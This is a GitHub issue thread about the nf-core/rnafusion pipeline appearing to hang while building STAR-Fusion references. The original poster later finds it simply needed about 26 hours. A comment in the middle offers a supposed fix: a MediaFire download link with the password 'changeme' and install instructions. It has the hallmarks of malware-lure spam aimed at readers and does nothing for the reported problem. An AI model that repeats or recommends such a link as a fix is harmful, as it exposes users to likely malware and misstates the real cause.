### ISSUE TITLE
Pipeline gets stuck during reference building

### ISSUE THREAD

**Issue by frenkiboy** [nf-core/rnafusion#499]
### Description of the bug

When I run the referecne building for star fusion the pipeline gets stuck (hangs for >24h) on the last step.

![image](https://github.com/user-attachments/assets/b1874a3f-3404-42f0-ba6b-b0fe7ee1e321)

### Command used and terminal output

```console
nextflow run nf-core/rnafusion \
   -profile singularity \
   -resume \
   --build_references --starfusion \
   --genomes_base $reference \
   --outdir $outdir \
   --max_cpus 16
```

### System information

nextflow version 23.10.1.5891
HPC
local
Singularity
Ubuntu
latest

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by frenkiboy** [comment]
Pipeline ran!

seems I just had to wait for 26 hours.
